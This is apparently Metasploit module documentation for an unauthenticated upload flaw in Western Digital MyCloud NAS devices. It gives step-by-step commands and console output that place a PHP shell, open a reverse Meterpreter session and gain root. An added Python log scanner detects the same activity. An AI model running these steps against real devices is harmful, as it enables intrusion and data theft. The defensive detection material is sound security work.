## Description

This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The `/web/jquery/uploader/multi_uploadify.php` PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker to upload a PHP shell onto the device and obtain arbitrary code execution as root.

## Vulnerable Application

[Western Digital](https://www.wdc.com/) designs drives and network attached storage (NAS) devices for both consumers and businesses.

This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172.

## Verification Steps

1. Do: ```use exploit/linux/http/wd_mycloud_multiupload_upload```
2. Do: ```set RHOST [IP]```
3. Do: ```check```
4. It should be reported as vulnerable
5. Do: ```run```
6. You should get a shell

## Scenarios

```
msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run

[*] Started reverse TCP handler on 192.168.86.215:4444
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php

meterpreter > getuid
Server username: root (0)
```
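
A defender-side check for the behaviour described above, as an added example that is not part of the Metasploit module or its documentation: it scans web access logs for POSTs to the upload script and for requests to dot-prefixed PHP files like the one in the Scenarios output. The Apache "combined" log format, the function name `find_upload_activity` and the sample lines are assumptions constructed for illustration.

```python
import re

# Upload script path taken from the module description.
UPLOAD_PATH = "/web/jquery/uploader/multi_uploadify.php"

# Assumption: access logs are in Apache "combined" format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
# A PHP file whose basename starts with a dot, as in the Scenarios output.
HIDDEN_PHP_RE = re.compile(r'/\.[^/]+\.php$', re.IGNORECASE)

# Constructed sample log lines (documentation-range addresses, made-up file names).
SAMPLE_LOG = """\
192.0.2.10 - - [28/Nov/2017:06:07:10 -0600] "GET /web/css/main.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.66 - - [28/Nov/2017:06:07:13 -0600] "POST /web/jquery/uploader/multi_uploadify.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
192.0.2.66 - - [28/Nov/2017:06:07:14 -0600] "GET /.a1b2c3.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.0.2.10 - - [28/Nov/2017:06:08:00 -0600] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.77 - - [28/Nov/2017:06:09:00 -0600] "GET /.probe.php HTTP/1.1" 404 0 "-" "curl/7.50"
"""

def find_upload_activity(log_text):
    """Return (kind, client_ip, timestamp, path) tuples worth triaging."""
    uploaders = {}  # client IP -> timestamp of its first POST to the upload script
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts = m["ip"], m["ts"]
        path = m["uri"].split("?", 1)[0]  # compare on the path, ignoring any query string
        if m["method"] == "POST" and path == UPLOAD_PATH:
            uploaders.setdefault(ip, ts)
            findings.append(("upload_endpoint_post", ip, ts, path))
        elif HIDDEN_PHP_RE.search(path):
            # Higher priority when the same client posted to the upload script earlier.
            kind = "hidden_php_after_upload" if ip in uploaders else "hidden_php_request"
            findings.append((kind, ip, ts, path))
    return findings

if __name__ == "__main__":
    for finding in find_upload_activity(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Because the Scenarios output shows the uploaded file being deleted after use, the access log may be the only remaining trace, so a `hidden_php_after_upload` finding should be triaged even when the file is no longer on disk.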